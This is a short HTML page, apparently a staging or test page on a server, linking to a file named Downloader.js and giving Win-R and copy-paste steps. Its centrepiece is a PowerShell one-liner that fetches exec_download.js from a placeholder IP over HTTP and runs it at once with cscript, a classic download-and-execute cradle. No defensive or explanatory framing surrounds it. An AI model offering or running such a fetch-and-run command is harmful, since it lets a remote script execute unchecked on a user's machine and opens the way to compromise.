<!DOCTYPE html>
<html>
<head>
    <title>test</title>
</head>
<body>
    <a href="/myIP">Server IP</a><br>
    <a href="/exec_download.js">Downloader.js</a><br>

    <p>
    Win-R: cmd <br>

    Copy-Paste: <br>
    powershell -command "& { iwr http://$IP_ADDRESS/exec_download.js -OutFile exec_download.js }" && cscript exec_download.js<br>


</body>
</html>